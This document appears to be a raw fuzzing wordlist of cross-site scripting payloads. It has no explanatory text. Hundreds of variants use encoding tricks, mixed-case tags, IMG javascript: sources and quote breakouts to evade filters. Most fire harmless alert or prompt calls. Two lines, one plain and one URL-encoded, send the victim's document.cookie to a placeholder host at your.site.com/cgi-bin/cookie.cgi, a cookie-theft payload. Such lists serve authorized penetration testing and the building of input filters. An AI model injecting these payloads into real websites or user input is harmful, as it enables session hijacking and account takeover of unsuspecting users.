"%3e%3cScRiPt%3eAlErT('XSS')%3c%2fScRiPt%3e
"%3e%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
"%3e%3cScRiPt%3ePrOmPt('XSS')%3c%2fScRiPt%3e
"%3e%3cScRiPt%3ePrOmPt(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
"%3e%3cscript%3ealert('XSS')%3c%2fscript%3e
"%3e%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
"%3e%3cscript%3eprompt('XSS')%3c%2fscript%3e
"%3e%3cscript%3eprompt(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
"><ScRiPt>AlErT('XSS')</ScRiPt>
"><ScRiPt>AlErT(String.fromCharCode(88, 83, 83)</ScRiPt>
"><ScRiPt>PrOmPt('XSS')</ScRiPt>
"><ScRiPt>PrOmPt(String.fromCharCode(88, 83, 83)</ScRiPt>
"><script>"
"><script>alert('XSS')</script>
"><script>alert(String.fromCharCode(88, 83, 83)</script>
"><script>document.location='http://your.site.com/cgi-bin/cookie.cgi?'+document.cookie</script>
"><script>prompt('XSS')</script>
"><script>prompt(String.fromCharCode(88, 83, 83)</script>
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E
%3cscript%3ealert("XSS");%3c/script%3e
%3cscript%3ealert(document.cookie);%3c%2fscript%3e
%5c%5c%3e%3cScRiPt%3eAlErT(%5cXSS%5c)%3c%2fScRiPt%3e
%5c%5c%3e%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
%5c%5c%3e%3cScRiPt%3ePrOmPt(%5cXSS%5c)%3c%2fScRiPt%3e
%5c%5c%3e%3cScRiPt%3ePrOmPt(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
%5c%5c%3e%3cscript%3ealert(%5cXSS%5c)%3c%2fscript%3e
%5c%5c%3e%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
%5c%5c%3e%3cscript%3eprompt(%5cXSS%5c)%3c%2fscript%3e
%5c%5c%3e%3cscript%3eprompt(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
&ltscript&gtalert(document.cookie);&ltscript&gtalert
&ltscript&gtalert(document.cookie);</script>
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
'';!--"<XSS>=&{()}
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
'><script>alert(document.cookie);</script>
'><script>alert(document.cookie)</script>
<<script>alert("XSS");//<</script>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<IMG SRC=" &#14;  javascript:alert('XSS');">
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS')"
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=`javascript:alert("'XSS'")`>
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'>
<IMG%20SRC='javasc	ript:alert(document.cookie)'>
<IMG%20SRC='javascript:alert(document.cookie)'>
<ScRiPt>AlErT('XSS')</ScRiPt>
<ScRiPt>AlErT(String.fromCharCode(88, 83, 83)</ScRiPt>
<ScRiPt>PrOmPt('XSS')</ScRiPt>
<ScRiPt>PrOmPt(String.fromCharCode(88, 83, 83)</ScRiPt>
<script>alert("XSS")</script>
<script>alert('Zer0Lulz')</script>
<script>alert(String.fromCharCode(88, 83, 83)</script>
<script>alert(document.cookie)</script>
<script>prompt('Zer0Lulz')</script>
<script>prompt(String.fromCharCode(88, 83, 83)</script>
<xss><script>alert('XSS')</script></vulnerable>
="%3e%3c%3cScRiPt%3eAlErT('XSS')%3c%2fScRiPt%3e
="%3e%3c%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
="%3e%3c%3cScRiPt%3ePrOmPt('XSS')%3c%2fScRiPt%3e
="%3e%3c%3cScRiPt%3ePrOmPt(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
="%3e%3c%3cscript%3ealert('XSS')%3c%2fscript%3e
="%3e%3c%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
="%3e%3c%3cscript%3eprompt('XSS')%3c%2fscript%3e
="%3e%3c%3cscript%3eprompt(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
="%3e%3cScRiPt%3eAlErT('XSS')%3c%2fScRiPt%3e
="%3e%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
="%3e%3cScRiPt%3ePrOmPt('XSS')%3c%2fScRiPt%3e
="%3e%3cScRiPt%3ePrOmPt(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
="%3e%3cscript%3ealert('XSS')%3c%2fscript%3e
="%3e%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
="%3e%3cscript%3eprompt('XSS')%3c%2fscript%3e
="%3e%3cscript%3eprompt(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
="><<ScRiPt>AlErT('XSS')</ScRiPt>
="><<ScRiPt>AlErT(String.fromCharCode(88, 83, 83)</ScRiPt>
="><<ScRiPt>PrOmPt('XSS')</ScRiPt>
="><<ScRiPt>PrOmPt(String.fromCharCode(88, 83, 83)</ScRiPt>
="><<script>alert('XSS')</script>
="><<script>alert(String.fromCharCode(88, 83, 83)</script>
="><<script>prompt('XSS')</script>
="><<script>prompt(String.fromCharCode(88, 83, 83)</script>
="><ScRiPt>AlErT('XSS')</ScRiPt>
="><ScRiPt>AlErT(String.fromCharCode(88, 83, 83)</ScRiPt>
="><ScRiPt>PrOmPt('XSS')</ScRiPt>
="><ScRiPt>PrOmPt(String.fromCharCode(88, 83, 83)</ScRiPt>
="><script>alert('XSS')</script>
="><script>alert(String.fromCharCode(88, 83, 83)</script>
="><script>prompt('XSS')</script>
="><script>prompt(String.fromCharCode(88, 83, 83)</script>
=%3e%3c%3e%3cScRiPt%3eAlErT(%5cXSS%5c)%3c%2fScRiPt%3e
=%3e%3c%3e%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
=%3e%3c%3e%3cScRiPt%3ePrOmPt(%5cXSS%5c)%3c%2fScRiPt%3e
=%3e%3c%3e%3cScRiPt%3ePrOmPt(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
=%3e%3c%3e%3cScRiPt>AlErT('XSS')%3c%2fScRiPt%3e
=%3e%3c%3e%3cScRiPt>AlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
=%3e%3c%3e%3cScRiPt>PrOmPt('XSS')%3c%2fScRiPt%3e
=%3e%3c%3e%3cScRiPt>PrOmPt(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
=%3e%3c%3e%3cscript%3ealert(%5cXSS%5c)%3c%2fscript%3e
=%3e%3c%3e%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
=%3e%3c%3e%3cscript%3eprompt(%5cXSS%5c)%3c%2fscript%3e
=%3e%3c%3e%3cscript%3eprompt(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
=%3e%3c%3e%3cscript>alert('XSS')%3c%2fscript%3e
=%3e%3c%3e%3cscript>alert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
=%3e%3c%3e%3cscript>prompt('XSS')%3c%2fscript%3e
=%3e%3c%3e%3cscript>prompt(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
=%5c%3e%3c%3cScRiPt%3eAlErT(%5cXSS%5c)%3c%2fScRiPt%3e
=%5c%3e%3c%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
=%5c%3e%3c%3cScRiPt%3ePrOmPt(%5cXSS%5c)%3c%2fScRiPt%3e
=%5c%3e%3c%3cScRiPt%3ePrOmPt(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e=%5c%3e%3c%3cscript%3ealert(%5cXSS%5c)%3c%2fscript%3e
=%5c%3e%3c%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
=%5c%3e%3c%3cscript%3eprompt(%5cXSS%5c)%3c%2fscript%3e
=%5c%3e%3c%3cscript%3eprompt(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
=%5c%3e%3cScRiPt%3eAlErT(%5cXSS%5c)%3c%2fScRiPt%3e
=%5c%3e%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
=%5c%3e%3cScRiPt%3ePrOmPt(%5cXSS%5c)%3c%2fScRiPt%3e
=%5c%3e%3cScRiPt%3ePrOmPt(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
=%5c%3e%3cscript%3ealert(%5cXSS%5c)%3c%2fscript%3e
=%5c%3e%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
=%5c%3e%3cscript%3eprompt(%5cXSS%5c)%3c%2fscript%3e
=%5c%3e%3cscript%3eprompt(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
=%5c%5c%3e%3c%3cScRiPt%3eAlErT(%5cXSS%5c)%3c%2fScRiPt%3e
=%5c%5c%3e%3c%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
=%5c%5c%3e%3c%3cScRiPt%3ePrOmPt(%5cXSS%5c)%3c%2fScRiPt%3e
=%5c%5c%3e%3c%3cScRiPt%3ePrOmPt(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
=%5c%5c%3e%3c%3cscript%3ealert(%5cXSS%5c)%3c%2fscript%3e
=%5c%5c%3e%3c%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
=%5c%5c%3e%3c%3cscript%3eprompt(%5cXSS%5c)%3c%2fscript%3e
=%5c%5c%3e%3c%3cscript%3eprompt(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
=%5c%5c%3e%3cScRiPt%3eAlErT(%5cXSS%5c)%3c%2fScRiPt%3e
=%5c%5c%3e%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
=%5c%5c%3e%3cScRiPt%3ePrOmPt(%5cXSS%5c)%3c%2fScRiPt%3e
=%5c%5c%3e%3cScRiPt%3ePrOmPt(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
=%5c%5c%3e%3cscript%3ealert(%5cXSS%5c)%3c%2fscript%3e
=%5c%5c%3e%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
=%5c%5c%3e%3cscript%3eprompt(%5cXSS%5c)%3c%2fscript%3e
=%5c%5c%3e%3cscript%3eprompt(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
='%3e%3c%3cScRiPt%3eAlErT('XSS')%3c%2fScRiPt%3e
='%3e%3c%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
='%3e%3c%3cScRiPt%3ePrOmPt('XSS')%3c%2fScRiPt%3e
='%3e%3c%3cScRiPt%3ePrOmPt(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
='%3e%3c%3cscript%3ealert('XSS')%3c%2fscript%3e
='%3e%3c%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
='%3e%3c%3cscript%3eprompt('XSS')%3c%2fscript%3e
='%3e%3c%3cscript%3eprompt(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
='%3e%3cScRiPt%3eAlErT('XSS')%3c%2fScRiPt%3e
='%3e%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
='%3e%3cScRiPt%3ePrOmPt('XSS')%3c%2fScRiPt%3e
='%3e%3cScRiPt%3ePrOmPt(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
='%3e%3cscript%3ealert('XSS')%3c%2fscript%3e
='%3e%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
='%3e%3cscript%3eprompt('XSS')%3c%2fscript%3e
='%3e%3cscript%3eprompt(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
='><<ScRiPt>AlErT('XSS')</ScRiPt>
='><<ScRiPt>AlErT(String.fromCharCode(88, 83, 83)</ScRiPt>
='><<ScRiPt>PrOmPt('XSS')</ScRiPt>
='><<ScRiPt>PrOmPt(String.fromCharCode(88, 83, 83)</ScRiPt>
='><<script>alert('XSS')</script>
='><<script>alert(String.fromCharCode(88, 83, 83)</script>
='><<script>prompt('XSS')</script>
='><<script>prompt(String.fromCharCode(88, 83, 83)</script>
='><ScRiPt>AlErT('XSS')</ScRiPt>
='><ScRiPt>AlErT(String.fromCharCode(88, 83, 83)</ScRiPt>
='><ScRiPt>PrOmPt('XSS')</ScRiPt>
='><ScRiPt>PrOmPt(String.fromCharCode(88, 83, 83)</ScRiPt>
='><script>alert('XSS')</script>
='><script>alert(String.fromCharCode(88, 83, 83)</script>
='><script>prompt('XSS')</script>
='><script>prompt(String.fromCharCode(88, 83, 83)</script>
=><><ScRiPt>AlErT('XSS')</ScRiPt>
=><><ScRiPt>AlErT(String.fromCharCode(88, 83, 83)</ScRiPt>
=><><ScRiPt>PrOmPt('XSS')</ScRiPt>
=><><ScRiPt>PrOmPt(String.fromCharCode(88, 83, 83)</ScRiPt>
=><><script>alert('XSS')</script>
=><><script>alert(String.fromCharCode(88, 83, 83)</script>
=><><script>prompt('XSS')</script>
=><><script>prompt(String.fromCharCode(88, 83, 83)</script>
=\><<ScRiPt>AlErT('XSS')</ScRiPt>
=\><<ScRiPt>AlErT(String.fromCharCode(88, 83, 83)</ScRiPt>
=\><<ScRiPt>PrOmPt('XSS')</ScRiPt>
=\><<ScRiPt>PrOmPt(String.fromCharCode(88, 83, 83)</ScRiPt>
=\><<script>alert('XSS')</script>
=\><<script>alert(String.fromCharCode(88, 83, 83)</script>
=\><<script>prompt('XSS')</script>
=\><<script>prompt(String.fromCharCode(88, 83, 83)</script>
=\><ScRiPt>AlErT('XSS')</ScRiPt>
=\><ScRiPt>AlErT(String.fromCharCode(88, 83, 83)</ScRiPt>
=\><ScRiPt>PrOmPt('XSS')</ScRiPt>
=\><ScRiPt>PrOmPt(String.fromCharCode(88, 83, 83)</ScRiPt>
=\><script>alert('XSS')</script>
=\><script>alert(String.fromCharCode(88, 83, 83)</script>
=\><script>prompt('XSS')</script>
=\><script>prompt(String.fromCharCode(88, 83, 83)</script>
=\\><<ScRiPt>AlErT('XSS')</ScRiPt>
=\\><<ScRiPt>AlErT(String.fromCharCode(88, 83, 83)</ScRiPt>
=\\><<ScRiPt>PrOmPt('XSS')</ScRiPt>
=\\><<ScRiPt>PrOmPt(String.fromCharCode(88, 83, 83)</ScRiPt>
=\\><<script>alert('XSS')</script>
=\\><<script>alert(String.fromCharCode(88, 83, 83)</script>
=\\><<script>prompt('XSS')</script>
=\\><<script>prompt(String.fromCharCode(88, 83, 83)</script>
=\\><ScRiPt>AlErT('XSS')</ScRiPt>
=\\><ScRiPt>AlErT(String.fromCharCode(88, 83, 83)</ScRiPt>
=\\><ScRiPt>PrOmPt('XSS')</ScRiPt>
=\\><ScRiPt>PrOmPt(String.fromCharCode(88, 83, 83)</ScRiPt>
=\\><script>alert('XSS')</script>
=\\><script>alert(String.fromCharCode(88, 83, 83)</script>
=\\><script>prompt('XSS')</script>
=\\><script>prompt(String.fromCharCode(88, 83, 83)</script>
\";alert('XSS');//
\\><ScRiPt>AlErT('XSS')</ScRiPt>
\\><ScRiPt>AlErT(String.fromCharCode(88, 83, 83)</ScRiPt>
\\><ScRiPt>PrOmPt('XSS')</ScRiPt>
\\><ScRiPt>PrOmPt(String.fromCharCode(88, 83, 83)</ScRiPt>
\\><script>alert('XSS')</script>
\\><script>alert(String.fromCharCode(88, 83, 83)</script>
\\><script>prompt('XSS')</script>
\\><script>prompt(String.fromCharCode(88, 83, 83)</script>
